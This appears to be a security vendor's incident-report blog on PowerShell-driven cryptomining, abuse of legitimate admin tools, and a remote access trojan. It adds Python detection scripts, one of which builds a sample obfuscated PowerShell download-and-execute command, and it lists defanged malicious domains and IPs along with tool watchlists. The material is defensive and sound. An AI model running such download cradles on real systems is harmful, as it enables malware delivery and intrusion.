Between April 17-24, 2024, Blackpoint’s Security Operations Center (SOC) responded to 188 total incidents. These incidents included 16 on-premises Managed Detection and Response (MDR) incidents, 4 Cloud Response for Google Workspace, and 168 Cloud Response for Microsoft 365 incidents, with confirmed or likely threat actor use of:
- PowerShell scripts and malicious domains for execution
- PC Hunter and other legitimate tools for persistence and discovery
- A remote access trojan (RAT) and scheduled tasks for persistence
In this blog, we’ll dive into the details behind these select incidents, including why they’re important for partners to account for today – even if they’ve not been attacked yet! – as well as possible mitigations leveraging your current tech stack and Blackpoint Cyber.
Please note: As these analyses concern recent incidents in actively monitored environments, certain details may be omitted and / or obfuscated to protect our partners and any still-ongoing investigations. However, we felt that these incidents were important enough to be brought to the community’s attention as fast as possible, and so included them in this public writeup.
Please feel free to reach out to the APG directly if you have any questions about a specific incident.
Malicious PowerShell Scripts and Unauthorized Cryptomining Incident with Government Partner on April 19, 2024
Topline Takeaways
- Industry target: Government
- Attacker information:
  - PowerShell scripts
  - hxxps://raw.githubusercontent.com/upinfoarch/up/master/domtar
  - hxxp://dfdfjkbcv.net
- Antivirus (AV) and / or Endpoint Detection and Response (EDR) present in environment? Yes
- Threat assessment for partners:
  - The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use malicious PowerShell scripts to exploit other government organizations over the next 12 months.
- Recommended remediations and mitigations:
  - Heuristics-based activity monitoring and remediation
  - Employee security training
  - Multifactor authentication (MFA)
What happened?
Last Friday, Blackpoint’s SOC was alerted to PowerShell executing base64-encoded commands on a government partner’s client. Further investigation revealed that the commands leveraged multiple obfuscation techniques, a common indicator of malicious intent.
Blackpoint’s SOC identified two URLs within the decoded script, both with negative reputations.
One of the identified URLs, “hxxp://dfdfjkbcv.net”, was flagged as malicious by 13 security vendors on VirusTotal (1), and the domain has been observed in connection with multiple cryptomining malware (2 and 3).
The Blackpoint SOC immediately isolated the device and reached out to our impacted government partner to advise on the incident and provide further remediation recommendations.
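As an added example that is not part of the original post, the detection logic below does what an analyst does with an alert like the one above: it decodes a PowerShell -EncodedCommand argument (UTF-16LE, then base64), rejoins string literals that were split with '+', scores common obfuscation and download-cradle indicators, and only then extracts URLs for reputation checks. The command lines, the example.invalid URL, the indicator list and the score threshold are constructed for this example and are not Blackpoint rules.

```python
import base64
import re

# Constructed sample command lines for this example (not from the incident).
# The encoded payload is a harmless demonstration string that only references
# the reserved domain example.invalid.
def encode_ps(command: str) -> str:
    """Encode a command the way powershell.exe -EncodedCommand expects it:
    UTF-16LE text, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

SAMPLE_INNER = (
    "$u='http://'+'example'+'.invalid/payload';"
    "IEX (New-Object Net.WebClient).DownloadString($u)"
)
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoP -W Hidden -Enc " + encode_ps(SAMPLE_INNER),  # obfuscated downloader
    "powershell.exe -Command Get-Process | Sort-Object CPU",         # routine admin use
    "cmd.exe /c whoami",                                             # not PowerShell at all
]

# -e, -ec, -enc, -encodedcommand ... followed by a base64 blob.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
# Accepts live (http) and defanged (hxxp) forms so the same rule works on reports.
URL_RE = re.compile(r"(?i)\bh(?:tt|xx)ps?://[^\s'\"()]+")
# Adjacent single-quoted literals joined with '+': the classic way to split a URL.
CONCAT_RE = re.compile(r"'\s*\+\s*'")

# Each indicator is (label, pattern); any one alone is weak, several together are not.
INDICATORS = [
    ("string-concat", re.compile(r"'[^']*'\s*\+\s*'[^']*'")),
    ("invoke-expression", re.compile(r"(?i)\b(?:iex|invoke-expression)\b")),
    ("download-cradle", re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b")),
    ("hidden-window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("no-profile", re.compile(r"(?i)-nop(?:rofile)?\b")),
]

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none
    or the blob is not valid base64 / UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(cmdline: str) -> dict:
    """Score one process command line: decode, look for obfuscation, pull URLs."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [label for label, rx in INDICATORS if rx.search(text)]
    # Join split literals before URL extraction so 'http://'+'x' becomes 'http://x'.
    urls = URL_RE.findall(CONCAT_RE.sub("", text))
    # Encoded commands are common in legitimate automation; weight the combination
    # rather than the encoding alone. Threshold is an assumption for this example.
    score = (1 if decoded else 0) + len(hits) + (2 if urls else 0)
    return {"decoded": decoded, "indicators": hits, "urls": urls,
            "score": score, "suspicious": score >= 4}

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        r = analyze(line)
        print(f"{'SUSPICIOUS' if r['suspicious'] else 'ok':10} score={r['score']} "
              f"indicators={r['indicators']} urls={r['urls']}")
```

Run as-is, the first command line decodes, trips all five indicators and yields one URL to submit for reputation lookup; the routine Get-Process line scores zero. Feeding the same function process-creation events from Sysmon or Event ID 4688 with command-line logging enabled is the realistic deployment.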
More About Malicious PowerShell Scripts and Unauthorized Cryptomining
Threat actors very frequently use PowerShell to execute malicious commands during their attacks: to deploy ransomware, to spy on and exfiltrate sensitive information, and to conduct other malicious activities (5). In this incident, however, the APG and SOC believe the primary goal of the attack was to install cryptomining malware on government machines.
“Cryptomining” is the process of creating a unit of cryptocurrency where “miners” solve complex mathematical equations to validate data blocks and add transaction details to a blockchain. The user is then rewarded with a payment via cryptocurrency (4). Threat actors will often use malware to illegally access and exploit victims’ computer resources, secretly running private cryptomining operations for financial gain until discovered.
Some of the more popular cryptomining malware examples include XMRig, DarkGate, and RubyMiner (3).
While cryptomining malware is not often considered as great a threat to organizations’ security or general operations as other malware types, threat actors that gain this type of unauthorized access to victim devices can sell that access to other malicious actors.
In the wrong hands, this access can help advanced adversaries and technically skilled ransomware threat actors to download and execute additional malware – such as backdoors and information stealers – and discover and exfiltrate sensitive information – such as credentials and intellectual property.
APG Threat Analysis of Malicious PowerShell Scripts and Unauthorized Cryptomining for 2024
The APG predicts that threat actors will likely continue to use obfuscated PowerShell scripts to fetch, download, and execute malware from malicious domains – including cryptomining malware – over the next 12 months.
We base this assessment on internal telemetry and analysis of this incident and other Blackpoint environment incidents, as well as fellow researchers’ observations.
In 2023, for example, security researchers with Cisco Talos reported an ongoing cryptocurrency mining campaign that deployed malicious payloads by abusing a legitimate tool, Advanced Installer (6). The attackers reportedly used it to package installers with malicious PowerShell and Windows batch scripts.
Recommended Malicious PowerShell Scripts Mitigations and Remediations
The APG recommends the following actions to help mitigate the use of PowerShell scripts to reach out to malicious domains to retrieve and download malware payloads:
- Heuristics-based activity monitoring and remediation to detect unusual patterns that could be indicative of malicious behavior by threat actors. In this incident, it was the heuristics-based alerting on our partner’s environment that caught the abuse of local machines before their memory, computational resources, and ultimately access could be conscripted for unauthorized use.
- Employee security training to ensure that all users understand what is (and is not) authorized use of organization resources and decrease the potential of internal threat actors “getting away with” the installation of malicious scripts. Of course, the standard phishing training recommendations apply here, too, to avoid net-new malicious access!
- MFA enforced on all user accounts – but especially those with privileged access! – to help decrease the chances of undetected credential compromise.
PCHunter Incident with Industrials Partner on April 22, 2024
Topline Takeaways
- Industry target: Industrials
- Attacker information:
  - PCHunter64.exe
  - FileZilla
  - Remote desktop protocol (RDP)
- AV and / or EDR present in environment? Yes
- Threat assessment for partners:
  - The APG predicts that it is very likely that threat actors will continue to use legitimate, allowlisted Windows tools to exploit other industrials organizations over the next 12 months.
- Recommended remediations and mitigations:
  - Least-privilege access controls
  - Zero trust network architecture
  - Regularly audit both environment and endpoints
PCHunter Incident Timeline for April 22, 2024
- 11:55 p.m. ET: Blackpoint’s MDR alerted to an industrial end client’s security product blocking the hacking tool “PCHunter64.exe” running from the unusual location of “C:\PerfLogs”.
- 11:58 p.m. ET: An MDR analyst began initial triage and investigation, during which six additional impacted devices were discovered. The investigation also found failed attempts by two separate user accounts on a single machine to mount the ADMIN$ share of several other machines, as well as other indicators of compromise (IoCs), including the threat actor’s use of:
  - FileZilla
  - MASSCAN
  - PowerTool
  - AnyDesk
  - RDP for inter-machine network connections
- 11:58 p.m. ET: The analyst escalated the incident to senior SOC leadership.
- 12:02 a.m. ET: The senior SOC analyst isolated all seven impacted endpoints from all external and internal communications.
- 12:11 a.m. ET: The SOC made contact with the partner about the incident and provided additional remediation advice.
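The two signals in the timeline above (a dual-use tool launched from C:\PerfLogs, and several accounts failing to mount ADMIN$) are both cheap to detect once process-creation and share-access telemetry is centralized. The script below is an added example, not Blackpoint code: the event dictionaries, field names, watchlist of tool names and directory list are all constructed for the example, and the severity scheme is an assumption.

```python
import ntpath
from collections import defaultdict

# Constructed watchlist of the dual-use tools named in the writeup (extend as needed).
DUAL_USE_TOOLS = {
    "pchunter64.exe", "pchunter32.exe", "powertool.exe", "masscan.exe",
    "anydesk.exe", "filezilla.exe",
}
# Directories from which legitimate admin tooling is rarely launched.
UNUSUAL_DIRS = (r"c:\perflogs", r"c:\users\public", r"c:\windows\temp")

# Constructed telemetry loosely modelled on process-creation and share-access
# events; the field names are this example's own, not any product's schema.
SAMPLE_EVENTS = [
    {"type": "process_create", "host": "WS-07", "user": "svc_backup",
     "image": r"C:\PerfLogs\PCHunter64.exe"},
    {"type": "process_create", "host": "WS-07", "user": "jdoe",
     "image": r"C:\Program Files\FileZilla FTP Client\filezilla.exe"},
    {"type": "process_create", "host": "WS-12", "user": "svc_backup",
     "image": r"C:\Users\Public\masscan.exe"},
    {"type": "process_create", "host": "WS-12", "user": "jdoe",
     "image": r"C:\Windows\System32\notepad.exe"},
    {"type": "share_access", "host": "WS-03", "user": "svc_backup",
     "share": r"\\WS-03\ADMIN$", "status": "failure"},
    {"type": "share_access", "host": "WS-03", "user": "svc_backup",
     "share": r"\\WS-03\ADMIN$", "status": "failure"},
    {"type": "share_access", "host": "WS-03", "user": "it-admin",
     "share": r"\\WS-03\ADMIN$", "status": "failure"},
    {"type": "share_access", "host": "WS-03", "user": "it-admin",
     "share": r"\\WS-03\C$", "status": "success"},
]

def dir_is_unusual(image_path: str) -> bool:
    """True if the binary lives in (or under) one of UNUSUAL_DIRS."""
    d = ntpath.dirname(image_path).lower().rstrip("\\")
    return any(d == u or d.startswith(u + "\\") for u in UNUSUAL_DIRS)

def classify_process(event: dict):
    """'high' = watchlisted tool from an unusual directory, 'medium' = watchlisted
    tool anywhere (review its business justification), 'low' = any binary from
    an unusual directory, None = nothing notable."""
    name = ntpath.basename(event["image"]).lower()
    listed, odd = name in DUAL_USE_TOOLS, dir_is_unusual(event["image"])
    if listed and odd:
        return "high"
    if listed:
        return "medium"
    return "low" if odd else None

def admin_share_failures(events, min_accounts: int = 2) -> dict:
    """Hosts on which at least min_accounts distinct accounts failed to mount
    ADMIN$; a lateral-movement attempt trying several credentials looks like
    this from the target's side."""
    failures = defaultdict(set)
    for e in events:
        if (e["type"] == "share_access" and e["status"] == "failure"
                and e["share"].upper().endswith("\\ADMIN$")):
            failures[e["host"]].add(e["user"])
    return {h: users for h, users in failures.items() if len(users) >= min_accounts}

def triage(events) -> dict:
    """Roll both detections up into the set of hosts an analyst would isolate."""
    flagged = [(e["host"], e["image"], sev) for e in events
               if e["type"] == "process_create" and (sev := classify_process(e))]
    shares = admin_share_failures(events)
    isolate = {h for h, _, sev in flagged if sev in ("high", "medium")} | set(shares)
    return {"processes": flagged, "admin_share_failures": shares, "isolate": isolate}

if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for host, image, sev in result["processes"]:
        print(f"{sev:6} {host} {image}")
    print("ADMIN$ failures:", result["admin_share_failures"])
    print("isolate:", sorted(result["isolate"]))
```

On the sample data this isolates three hosts: two that ran watchlisted tools (one of them the legitimately installed FileZilla, surfaced as "medium" so a human decides) and the one that saw two different accounts fail against its ADMIN$ share. The directory check is the part that carries the most weight: PCHunter in C:\PerfLogs is the page's own example of a "legitimate tool, wrong place" signal.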
More About Abuse of Legitimate Windows Tools and Processes: PC Hunter, MASSCAN, AnyDesk, and RDP
PC Hunter
PC Hunter is a toolkit with access to hundreds of settings including kernels, kernel modules, processes, network, startup, and more (7).
When abused, this tool can allow threat actors to effectively access sensitive processes, collect system information, and terminate security software.
FileZilla
FileZilla is a free file transfer protocol (FTP) software that can be used to manage website files, upload and download files, backup data, and transfer files between local and remote servers (8).
FileZilla is often abused by threat actors to exfiltrate sensitive data from victim environments. This data can later be sold on cybercriminal markets, held for extortion purposes, and used to conduct future cyberattacks.
The APG has previously tracked ransomware operators that have been observed using FileZilla to aid in exfiltration operations, including Akira (9), Trigona, Mallox, LockBit (10), Karakurt Hacking Team, and AvosLocker (11).
MASSCAN
MASSCAN is a TCP port scanner that transmits SYN packets asynchronously and produces results similar to nmap (12).
MASSCAN can be abused by threat actors to identify running applications and services on remote open ports. The Akira ransomware operation has previously deployed MASSCAN to discover additional remote system targets (13).
AnyDesk
AnyDesk is a legitimate and popular remote monitoring and management (RMM) tool used to remotely access and manage devices within an organization’s environment… and is often exploited by threat actors during cyberattacks.
The APG has identified 17 ransomware operators that have utilized the AnyDesk RMM tool during cyberattacks.
Ironically, not only do threat actors abuse legitimate tools such as AnyDesk to conduct attacks, but they also occasionally target them, as well. In January 2024, AnyDesk was targeted for its own cyberattack demonstrating the double-edged efficacy of RMM tools in MSP and organizational environments for sysadmins and threat actors alike (14).
RDP
RDP is a network communications protocol built into enterprise and pro versions of Windows. It is used for remote access to physical work devices, particularly for technicians to perform remote administrative work.
However, just like AnyDesk and RMM tools, threat actors abuse RDP for their own unauthorized remote access onto organizational devices (15).
RDP can be targeted for initial access via brute force, misconfigurations, vulnerabilities, and exposed instances. Threat actors also achieve persistence using RDP, as the protocol is a legitimate and pre-installed Windows function that blends in with legitimate traffic. Finally, RDP facilitates lateral movement, as its entire purpose is to allow (authorized) access to remote devices.
The APG has identified 29 ransomware operations that have previously targeted or used RDP during cyberattacks, including:
- LockBit
- Black Basta
- ALPHV / BlackCat
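Brute force is the first of the RDP initial-access avenues listed above, and it leaves a very regular footprint in the Windows Security log. The sliding-window detector below is an added example, not Blackpoint code: it counts failed logons (Event ID 4625) per source address within a time window and flags a subsequent success (4624) from the same source, which is the case worth paging on. The log extract, the addresses (documentation ranges) and the threshold are constructed for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed Windows Security log extract: (timestamp, event id, logon type,
# source IP, target account). 4625 = failed logon, 4624 = successful logon.
# Logon type 10 is RemoteInteractive (RDP); NLA-protected RDP commonly records
# its pre-authentication failures as type 3, so both types are considered.
SAMPLE_LOGONS = [
    ("2024-04-22T23:40:01", 4625, 10, "203.0.113.7", "administrator"),
    ("2024-04-22T23:40:20", 4625, 10, "203.0.113.7", "admin"),
    ("2024-04-22T23:40:41", 4625, 3,  "203.0.113.7", "backup"),
    ("2024-04-22T23:41:03", 4625, 10, "203.0.113.7", "administrator"),
    ("2024-04-22T23:41:25", 4625, 10, "203.0.113.7", "it-admin"),
    ("2024-04-22T23:41:47", 4625, 3,  "203.0.113.7", "svc_backup"),
    ("2024-04-22T23:42:10", 4624, 10, "203.0.113.7", "svc_backup"),
    ("2024-04-22T23:55:10", 4625, 10, "198.51.100.9", "jdoe"),  # one mistyped password
    ("2024-04-22T23:55:30", 4624, 10, "198.51.100.9", "jdoe"),
]

THRESHOLD = 5                   # failures from one source address ...
WINDOW = timedelta(minutes=5)   # ... inside this sliding window (assumed values)

def detect_rdp_bruteforce(events, threshold=THRESHOLD, window=WINDOW) -> dict:
    """Return {source_ip: {'failures', 'users', 'success_after'}} for every source
    that crossed the threshold. 'success_after' marks a 4624 from the same source
    after the alert fired, i.e. the guessing apparently worked and the account
    in question needs an immediate credential reset."""
    recent = defaultdict(deque)   # per source: failures still inside the window
    alerts = {}
    for ts, event_id, logon_type, ip, user in sorted(events, key=lambda e: e[0]):
        if logon_type not in (10, 3):
            continue
        t = datetime.fromisoformat(ts)
        if event_id == 4625:
            q = recent[ip]
            q.append((t, user))
            while q and t - q[0][0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"failures": 0, "users": set(),
                                           "success_after": False})
                a["failures"] = max(a["failures"], len(q))
                a["users"].update(u for _, u in q)
        elif event_id == 4624 and ip in alerts:
            alerts[ip]["success_after"] = True
    return alerts

if __name__ == "__main__":
    for ip, a in detect_rdp_bruteforce(SAMPLE_LOGONS).items():
        flag = "SUCCESS AFTER FAILURES" if a["success_after"] else "failures only"
        print(f"{ip}: {a['failures']} failures, {len(a['users'])} accounts, {flag}")
```

Only the 203.0.113.7 source fires: six failures across five account names in two minutes, followed by a success. The single typo from 198.51.100.9 never reaches the threshold, which is the point of windowing rather than counting all-time failures. Exposing RDP to the internet at all is the condition that makes this detector necessary; the mitigations later in this section are the better fix.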
APG Threat Analysis of Abuse of Legitimate Windows Tools and Processes for 2024
The APG predicts that threat actors will very likely continue to abuse legitimate Windows tools and processes – particularly RMM and other remote management and access tools – over the next 12 months.
We base this assessment in part on broader industry research, trends, and advisories.
Specifically, U.S. CISA previously released guidance on RMM software, warning of threat actors’ use of these legitimate tools for initial access, persistence, and lateral movement.
Additionally, the APG frequently observes threat actors’ continued attempted abuse of RMM tools during cyberattacks within SOC incidents and secured environments. While these tools are useful, RMMs and similar remote management tools present a tremendous amount of risk to MSPs and other partner organizations, as already-established tools for lateral movement make attractive targets for threat actors attempting to remain undetected by AV or EDR solutions.
Recommended Legitimate Windows Tools Abuse Mitigations and Remediations
The APG recommends the following actions to help mitigate the use of legitimate tools for malicious purposes by threat actors:
- Implement least-privilege access controls wherever possible, to quarantine even previously unknown compromised users to a limited set of applications and endpoints. The fewer things users have even passive access to that are not necessary for daily operations, the less likely a threat actor can find an easy point to hop from one device to another.
- Adopt a zero trust strategic security philosophy, which assumes that every request to each resource is malicious until otherwise proven by credentials, authorizations, and other checks – even if the request comes from a previously acceptable and cleared source. (Ask every time it’s feasible to do so!)
- Regularly audit both environment and endpoints for lingering credentials and authorizations that may no longer be needed, as well as ensuring that all technical and administrative controls are in place and effective throughout the organization. A policy is only as effective as how well it’s followed and enforced within your environment!
Remote Access Trojan Incident with Healthcare Partner on April 22, 2024
Topline Takeaways
- Industry target: Healthcare
- Attacker information:
  - RAT
  - wscript.exe
  - VBS scripts
- AV and / or EDR present in environment? Yes
- Threat assessment for partners:
  - The APG predicts that it is almost certain that threat actors will continue to use RATs leveraging wscript, VBS scripts, and PowerShell to exploit other healthcare organizations over the next 12 months.
- Recommended remediations and mitigations:
  - Scripting language controls
  - Controls preventing unauthorized use of legitimate tools and / or allowlisted applications
  - Heuristics-based activity monitoring and remediation
RAT Incident Timeline for April 22, 2024
- 10:23 p.m. ET: Blackpoint’s MDR alerted to a malicious wscript, a BITS download, AutoIt, and scheduled tasks executed and installed on a healthcare end client host. The files were saved in the Public folder, where the threat actor attempted to evade detection while continuing malicious downloads of VBS scripts, wscripts, PowerShell scripts, and other executable files. The threat actor also downloaded a RAT in an attempt to control access to the infected device.
- 10:23 p.m. ET: An MDR analyst began initial triage and investigation, during which they observed the threat actor’s RAT connecting to a Netherlands-based IP address and a known-malicious IP address in the United States.
- 10:44 p.m. ET: The analyst isolated the impacted endpoint from all external and internal communications, and scrubbed all malicious scheduled tasks to prevent further threat activity.
- 10:46 p.m. ET: The analyst escalated the incident to senior SOC leadership.
- 10:50 p.m. ET: The SOC made contact with the partner about the incident and provided additional remediation advice.
While the RAT in this incident was not identified during the active investigation, one of the IP addresses identified during Blackpoint’s SOC investigation – 104.243.32.185 – has previously been linked to an AsyncRAT campaign (16).
Active since at least 2019, AsyncRAT is an open-source RAT whose features include keylogging, initial access techniques, and final payload distribution (16).
More About Abuse of Scripting Languages and Scheduled Tasks
Scripting languages are programming languages that are used to manipulate, customize, and automate the functions of existing software or systems. Threat actors abuse these languages and interfaces to interact with and command victim endpoints.
Most systems come with built-in command line interfaces of some type – Unix Shell, PowerShell, Windows Command Shell, etc. – making it easier for threat actors to abuse when targeting a victim environment (17).
Scheduled tasks are just that: tasks that are scheduled to run according to a defined schedule. They could trigger on specific days or dates, a time, based on another event occurring (such as endpoint startup), and more.
Threat actors often abuse scheduled tasks to facilitate initial or recurring execution of malicious scripts. Threat actors’ tasks can be:
- Scheduled on remote systems to run at system startup,
- Set to a specific recurring schedule for persistence, or
- Otherwise abused to run under the context of a specified account, such as one with elevated privileges (18).
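The scheduled tasks in this incident combined exactly the properties listed above (script host as the action, files in the Public folder, recurring execution) and those properties are all visible in a task's exported XML definition, so they can be audited without running anything. The auditor below is an added example, not Blackpoint code: it parses Task Scheduler's XML format (the output of schtasks /query /xml or Export-ScheduledTask) and lists the traits an analyst would want to see before "scrubbing" a task. Both task definitions, the script-host list, the directory pattern and the three-finding threshold are constructed assumptions for this example.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Script hosts and living-off-the-land binaries that a task action rarely needs
# to launch directly (assumed watchlist for this example).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe", "certutil.exe"}
USER_WRITABLE = re.compile(r"(?i)\\(?:users\\public|appdata\\local\\temp|windows\\temp|programdata)\\")
# ISO 8601 durations as used by <Interval>, e.g. PT5M, PT1H30M, P1D.
DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")

# Constructed task definitions (not from the incident).
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled>
      <Repetition><Interval>PT5M</Interval></Repetition>
    </LogonTrigger>
  </Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>wscript.exe</Command><Arguments>//B C:\Users\Public\update.vbs</Arguments></Exec>
  </Actions>
</Task>"""

BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger><StartBoundary>2024-04-01T03:00:00</StartBoundary>
      <ScheduleByWeek><DaysOfWeek><Sunday/></DaysOfWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek>
    </CalendarTrigger>
  </Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-21-1111111111-2222222222-3333333333-1001</UserId><LogonType>InteractiveToken</LogonType></Principal></Principals>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\ExampleVendor\updater.exe</Command><Arguments>/check</Arguments></Exec>
  </Actions>
</Task>"""

def duration_minutes(iso: str):
    """Convert an ISO 8601 duration to minutes; None if it does not parse."""
    m = DURATION.match(iso.strip())
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60

def audit_task(task_xml: str) -> list:
    """Return a list of human-readable findings for one task definition."""
    root = ET.fromstring(task_xml)
    findings = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip()
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        exe = cmd.replace("/", "\\").rsplit("\\", 1)[-1].lower().strip('"')
        if exe in SCRIPT_HOSTS:
            findings.append(f"script host action: {exe}")
        if USER_WRITABLE.search(cmd + " " + args):
            findings.append("action references a user-writable directory")
    trig = root.find("t:Triggers", NS)
    if trig is not None:
        if trig.find("t:BootTrigger", NS) is not None:
            findings.append("runs at boot")
        if trig.find("t:LogonTrigger", NS) is not None:
            findings.append("runs at logon")
        for iv in trig.iterfind(".//t:Repetition/t:Interval", NS):
            mins = duration_minutes(iv.text or "")
            if mins is not None and mins <= 15:      # beaconing-style cadence
                findings.append(f"repeats every {mins:g} min")
    uid = root.findtext(".//t:Principals/t:Principal/t:UserId", default="", namespaces=NS)
    if uid.strip().upper() in ("S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"):
        findings.append("runs as SYSTEM")
    hidden = root.findtext(".//t:Settings/t:Hidden", default="false", namespaces=NS)
    if hidden.strip().lower() == "true":
        findings.append("hidden from the Task Scheduler UI")
    return findings

def is_suspicious(task_xml: str, min_findings: int = 3) -> bool:
    """Three or more traits together is the (assumed) review threshold."""
    return len(audit_task(task_xml)) >= min_findings

if __name__ == "__main__":
    for name, xml_text in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(name, "->", audit_task(xml_text) or ["no findings"])
```

The suspicious definition produces six findings (script host, Public-folder script, logon trigger, five-minute repetition, SYSTEM principal, hidden); the vendor updater produces none. Exporting every task under C:\Windows\System32\Tasks and running each file through audit_task gives a quick fleet-wide sweep, and any task that crosses the threshold is one to compare against the partner's known automation before it is removed.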
APG Threat Analysis of RATs and Abuse of Scripting Languages and Scheduled Tasks for 2024
The APG predicts that threat actors will almost certainly continue to use RATs and abuse scripting languages and scheduled tasks over the next 12 months.
We base this assessment especially on our own research and development on RATs and abuse of default device capabilities.
Of particular note for this incident, in 2022, the APG and SOC released a whitepaper detailing live environment observations of a threat actor using a typically allowlisted remote access tool, Arechclient2, running the scripting language AutoIt to conduct malicious activities.
The APG has further tracked 30 global ransomware operations using PowerShell scripts to conduct malicious activities, in addition to attempts on our own Blackpoint SOC-protected environments.
Finally, MITRE has tracked no fewer than 42 threat groups – including Turla, APT39, FIN7, and Sandworm Team – as well as 61 software/malware – including SmokeLoader, DarkGate, and IcedID – all of which abuse VBS scripts for malicious activities (19).
Recommended RAT Mitigations and Remediations
The APG recommends the following actions to help mitigate the use of malicious scheduled tasks and scripting languages:
- Minimize the use of – or implement strict controls on – the use of scripting languages, since threat actors clearly rely on scripting languages to deploy malware and conduct malicious activities.
- Implement application controls to block or restrict unauthorized applications from executing in suspicious or malicious ways – paying special attention to otherwise allowlisted apps or activities on the broader organizational environment that your average user typically wouldn’t use or do. (Even if your organization has developers, not everyone needs administrative rights on their endpoint or the ability to execute original scripts on their device!)
- Heuristics-based activity monitoring and remediation can help detect malicious behavior patterns lurking within allowlisted applications or protocols – and help ensure your environment remains secure even in the face of previously unknown exploitations or malicious scripts.
References and Resources
1. VirusTotal’s Repository: “dfdfjkbcv.net” by VirusTotal on April 18, 2024
2. Certego’s Blog: “Handling a distributed cryptominer AD worm” by Gabriele Pippi on December 24, 2020
3. ThreatFox’s Database: “Malware: win.monero_miner” by ThreatFox on April 24, 2022
4. CrowdStrike’s Blog: “What is Crypto-Malware?” by Kurt Baker on October 04, 2023
5. MITRE’s Repository: “Command and Scripting Interpreter: PowerShell” by MITRE on March 01, 2024
6. Cisco Talos’s Blog: “Cybercriminals target graphic designers with GPU miners” by Chetan Raghuprasad on September 07, 2023
7. Broadcom’s Blog: “Audit: PCHunter Tool Activity” by Broadcom on N/A
8. FileZilla’s Blog: “FileZilla” by FileZilla on N/A
9. U.S. CISA’s Advisories: “#StopRansomware: Akira Ransomware” by CISA on April 18, 2024
10. U.S. CISA’s Advisories: “#StopRansomware: LockBit 3.0” by CISA on March 16, 2023
11. U.S. CISA’s Advisories: “#StopRansomware: AvosLocker Ransomware (Update)” by CISA on October 11, 2023
12. Kali’s Blog: “MASSCAN” by Kali on March 11, 2024
13. Trend Micro’s Blog: “Ransomware Spotlight: Akira” by Trend Micro Research on October 05, 2023
14. Blackpoint Cyber’s Blog: “AnyDesk Attack Response Stirs Threat Analyst Criticism and Doubts” by Blackpoint Cyber on February 07, 2024
15. Blackpoint Cyber’s Blog: “How RDP Attacks Go Down” by Blackpoint Cyber on May 31, 2022
16. Blackpoint Cyber’s Blog: “Vulnerable RMM Tools and Vulnerable Industries: Why Vigilance is Key” by Blackpoint Cyber on March 28, 2024
17. SOCRadar’s Blog: “Campaign Alert: The Year-Long Shadow of AsyncRAT in U.S. Infrastructure” by SOCRadar on March 18, 2024
18. MITRE’s Repository: “Command and Scripting Interpreter” by MITRE on March 27, 2023
19. MITRE’s Repository: “Scheduled Task / Job” by MITRE on March 01, 2024